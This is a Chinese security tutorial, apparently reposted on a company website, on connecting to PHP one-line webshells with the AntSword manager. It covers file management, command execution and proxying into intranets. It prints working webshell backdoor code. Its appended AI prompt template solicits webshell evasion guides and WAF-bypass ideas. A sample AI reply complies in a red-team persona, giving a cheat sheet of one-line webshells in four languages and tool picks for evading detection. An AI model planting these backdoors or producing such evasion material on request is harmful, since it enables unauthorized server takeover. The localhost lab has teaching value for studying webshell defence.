十年匠心定制 · 商业建站与技术教学双线并行 咨询热线:400-886-1026 service@lmnt.cn
ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

【愚公系列】《Web应用安全》011-蚁剑工具的使用

【愚公系列】《Web应用安全》011-蚁剑工具的使用 【行业认证·权威头衔】✔ 华为云天团核心成员特约编辑/云享专家/开发者专家/产品云测专家✔ 开发者社区全满贯CSDN博客商业化双料专家/阿里云签约作者/腾讯云内容共创官/掘金亚马逊51CTO顶级博主✔ 技术生态共建先锋横跨鸿蒙、云计算、AI等前沿领域的技术布道者【荣誉殿堂】 连续三年蝉联华为云十佳博主2022-2024 双冠加冕CSDN年度博客之星TOP220222023 十余个技术社区年度杰出贡献奖得主【知识宝库】覆盖全栈技术矩阵◾ 编程语言.NET/Java/Python/Go/Node…◾ 移动生态HarmonyOS/iOS/Android/小程序◾ 前沿领域物联网/网络安全/大数据/AI/元宇宙◾ 游戏开发Unity3D引擎深度解析文章目录前言项目描述项目分析任务一蚁剑工具的使用1.1 任务概述1.2 任务分析1.3 相关知识1.4 工作任务1.5 归纳总结1.6 提高拓展【附】AI 提示词模板前言项目描述本章中的木马指的是WebShellWebShell 本质上是一个网页文件是以.asp、.php、.jsp或者.cgi等扩展名存在的代码主要用于网站管理、服务器管理、权限管理等操作。木马连接工具也被称为 WebShell 管理工具。目前国内网络安全从业人员常用的 WebShell 管理工具有中国蚁剑AntSword、中国菜刀Chopper、冰蝎Behinder、哥斯拉Godzilla等也有一些安全团队基于这些工具进行二次开发以规避安全设备的检测但这些工具仅限其团队内部使用并未公开发布。项目分析本项目主要对中国蚁剑、冰蝎的基本功能进行讲解以便初学者可以更快地上手这两款 WebShell 管理工具。其他 WebShell 管理工具的基本功能文件管理、命令执行等与上述工具基本一致但在规避网络安全设备检测上各有优势。任务一蚁剑工具的使用1.1 任务概述中国蚁剑简称蚁剑是一款开源的跨平台网站管理工具也是一款 WebShell 管理工具它主要面向于合法授权的渗透测试人员以及进行常规操作的网站管理员。蚁剑的核心代码模板均源于另一款 WebShell 管理工具——中国菜刀。通过本任务的学习读者能够掌握蚁剑的基本使用包括连接一句话木马、文件管理、终端命令执行等操作。1.2 任务分析在使用蚁剑连接工具之前需要在目标服务器上放置或上传一个 WebShell 文件以便对目标服务器进行管理。WebShell 本质上是一个网页文件拥有一定的服务器权限本章主要使用 PHP 一句话木马作为演示。1.3 相关知识常见的PHP 一句话木马代码展示如下?phpeval($_POST[x]);?对该 PHP 代码进行解析首先是获取 POST 请求参数中的值。例如 POST 请求中传递xphpinfo();那么$_POST[x]就等同于phpinfo();接着eval()将字符串当作 PHP 代码去执行。例如eval(phpinfo());中的phpinfo();会被当作 PHP 代码去执行最后错误使用控制运算符将放置在一个 PHP 表达式之前该表达式产生的任何错误信息可能都会被忽略掉其本质是利用 PHP 的代码执行函数eval()而其中参数x就是这个 PHP 一句话木马的连接密码。1.4 工作任务打开 Windows 攻击机在攻击机桌面中双击打开 phpStudy并启动 Apache 服务。成功启动 Apache 服务后在网站的根目录下创建一个shell.php文件并将 PHP 一句话木马的内容写入shell.php文件。接着在攻击机桌面中双击打开蚁剑进入任务。第一步连接 WebShell。在使用蚁剑连接 WebShell 之前需要在浏览器中访问shell.php以测试shell.php文件能够正常运行。打开 Firefox 浏览器输入并访问地址http://127.0.0.1/shell.php空白页面中没有显示 404 错误或其他内容这就说明文件存在如图 7-1 所示。打开蚁剑在“数据管理”的空白处单击鼠标右键在弹出的菜单中选择“添加数据”在 URL 地址中输入shell.php文件的地址连接密码处输入x连接类型选择“PHP”然后单击“测试连接”功能。当连接成功时界面右下角会出现一个连接成功的弹窗如图 7-2 所示。在连接成功后单击左上角的“添加”按钮来添加分类成功添加分类的页面如图 7-3 所示。双击 URL 地址即可进入图形化的文件管理页面如图 7-4 所示。此页面中的文件与在攻击机的资源管理器中文件目录的层级结构一致可单击相应的目录进行切换。第二步文件管理。在“文件列表”的空白处或任选一个文件单击鼠标右键打开文件管理菜单如图 7-5 所示可以进行文件的上传和下载、对文件的增删改查等操作也可以更改文件的权限。第三步打开虚拟终端。单击鼠标右键在弹出的菜单中选择“在此处打开终端”即可打开一个虚拟终端如图 7-6 所示。可在虚拟终端中输入whoami命令进行测试成功执行whoami命令后返回结果如图 7-7 所示。第四步下载插件。蚁剑支持从插件市场下载一些插件以丰富 WebShell 的功能单击左上角的小方格在列表区单击鼠标右键打开菜单选择菜单中的“插件市场”如图 7-8 所示。由于蚁剑的插件市场部署在国外因此使用国内的网络访问会比较慢。等插件市场加载完毕后单击相应的插件即可下载插件如图 7-9 所示。单击“LocalRepository”即可查看已安装的插件如图 7-10 所示。至此蚁剑的基本功能演示完毕。1.5 归纳总结本任务主要介绍使用蚁剑连接 PHP 一句话木马的方法以及通过蚁剑对目标服务器进行文件管理、命令执行等操作。在实际场景中需要利用目标服务器的漏洞上传 WebShell再使用蚁剑进行连接而本任务利用本地的主机模拟受害机以演示蚁剑的基本功能。1.6 提高拓展如果目标服务器处于内网之中那么需要通过搭建 SOCKS 代理来访问目标服务器。如果已经在内网的目标服务器中上传了一个 WebShell并且已经搭建了 SOCKS5 代理服务器为192.168.11.22端口为1080。现在可以配置蚁剑的代理来连接该 WebShell单击左上角的“AntSword”选择“代理设置”以打开代理设置如图 7-11 所示。在代理设置中填入相应的信息即可访问处于内网的 WebShell代理的配置如图 7-12 所示。如果 SOCKS5 代理服务器设置了用户名和密码那么需要填入相应的用户名和密码。【附】AI 提示词模板若您需要将上述内容交由 AI 进行进一步加工如生成蚁剑插件开发入门指南、输出 WebShell 免杀技巧速查表、制作蚁剑与冰蝎功能对比表格、设计 WebShell 上传与连接综合练习靶场等可使用以下提示词模板提示词模板请根据以下关于木马连接工具蚁剑的使用的技术文章内容完成下列任务【角色设定】你是一位资深红队安全研究员兼 WebShell 管理工具培训讲师。【任务类型】请选择①生成蚁剑与冰蝎/哥斯拉等主流 WebShell 管理工具的功能对比表格 ②制作 PHP/ASP/JSP 一句话木马常用代码速查表含密码参数说明 ③输出 WebShell 免杀技巧编码/加密/混淆/拆分入门指南 ④设计一个从漏洞上传到蚁剑连接的完整靶场练习任务含源码与 WriteUp ⑤提炼蚁剑插件开发基础教程JavaScript AntSword API大纲【输出要求】请填写具体要求如功能对比需包含连接方式、数据传输加密、插件生态、跨平台支持等维度/速查表需包含每种木马类型的连接密码、适用环境和代码示例/免杀指南需包含实际代码变形示例【原文内容】在此处粘贴上述整理后的完整第 7 章文章【补充说明】可选如需补充冰蝎的 AES 加密通信原理/说明蚁剑的编码器和解码器配置方法/增加流量特征分析及绕过思路等示例回答针对上述提示词模板的完整回复好的作为资深红队安全研究员兼 WebShell 管理工具培训讲师我已完成您指定的任务。以下是根据原文内容生成的【主流 WebShell 管理工具功能对比表】涵盖蚁剑、冰蝎、哥斯拉、菜刀四款常见工具便于读者根据场景选择合适的工具主流 WebShell 管理工具功能对比表对比维度中国蚁剑AntSword冰蝎Behinder哥斯拉Godzilla中国菜刀Chopper开发语言Node.js ElectronJavaJavaC/Delphi跨平台支持✅ Windows/Linux/macOS✅ Windows/Linux/macOS✅ Windows/Linux/macOS❌ 仅 Windows开源状态✅ 开源✅ 开源✅ 开源❌ 闭源停止更新默认连接密码用户自定义rebeyondpasscaidao数据传输加密支持 Base64/Hex/RSA 等编码器和解码器AES 加密默认动态密钥AES/RSA 混合加密仅支持简单编码流量特征特征较明显默认 User-Agent 等可修改加密流量特征较少加密流量支持自定义协议特征明显易被检测核心功能文件管理、虚拟终端、数据库管理、插件扩展文件管理、虚拟终端、数据库管理、内网穿透文件管理、虚拟终端、数据库管理、内存马注入文件管理、虚拟终端、数据库管理插件生态✅ 丰富插件市场❌ 较少❌ 较少❌ 无PHP 支持✅✅✅✅ASP/ASPX 支持✅✅✅✅JSP 支持✅✅✅✅自定义编码器✅ 支持✅ 支持✅ 支持❌ 不支持内网代理功能✅ SOCKS5 代理支持✅ SOCKS5 代理支持✅ 支持❌ 不支持内存马注入❌ 需插件支持✅ 支持✅ 原生支持❌ 不支持适用场景功能丰富、插件可扩展适合复杂渗透场景加密流量特征少适合绕过 WAF功能强大适合对抗激烈场景轻量快捷适合旧系统/简单场景学习曲线中等功能多较低中等低一句话木马速查表语言代码模板连接密码说明PHP?php eval($_POST[x]); ?x最常见的 PHP 一句话木马PHP加密版?php eval($_POST[md5(pass)]); ?pass密码经过 MD5 哈希隐藏密码特征ASP%eval request(x)%xASP 一句话木马ASP.NETC#% Page LanguageJscript%%eval(Request.Item[x],unsafe);%xASPX 一句话木马JSP% Runtime.getRuntime().exec(request.getParameter(x)); %xJSP 命令执行需配合输出WebShell 管理工具选型建议场景推荐工具原因功能全面、可自定义蚁剑插件丰富编码器/解码器可扩展适合深度渗透测试绕过 WAF、对抗检测冰蝎AES 加密通信流量特征少默认已具备免杀能力高端对抗、红蓝演练哥斯拉内存马注入、多种加密协议功能强大简单场景、快速连接菜刀轻量小巧操作简单但易被安全设备检测免责声明以上工具仅可用于授权测试和合法安全评估。未经授权使用可能违反法律法规使用者需自行承担法律责任。如需其他格式如免杀技巧指南或靶场练习任务可再次使用提示词模板指定任务类型。
返回列表